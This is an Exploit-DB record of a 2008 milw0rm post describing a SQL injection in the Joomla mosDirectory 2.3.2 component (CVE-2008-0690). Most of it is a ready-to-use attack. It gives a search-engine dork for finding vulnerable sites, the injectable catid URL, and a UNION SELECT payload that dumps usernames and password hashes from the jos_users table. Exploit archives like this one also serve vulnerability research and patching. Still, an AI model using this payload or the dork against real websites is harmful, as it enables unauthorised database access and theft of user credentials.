Joomla Component mosDirectory 2.3.2 catid SQL Injection Vulnerability

2008-02-03T00:00:00
ID EDB-ID:5047
Type exploitdb
Reporter GoLd_M
Modified 2008-02-03T00:00:00

Description

Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability. CVE-2008-0690. Webapps exploit for php platform

                                        
                                            ###########################################################################################
### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability      ###
### Script :  :(                                                                          ###
### Dork : inurl:index.php?option=com_directory                                         ###
### Injection Adress : /index.php?option=com_directory&page=viewcat&catid=[SQL Code]    ###
### SQL Code :                                                                          ###
###   -1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*  ###
###                                     aNa TrYaGi                                      ###
###########################################################################################

# milw0rm.com [2008-02-03]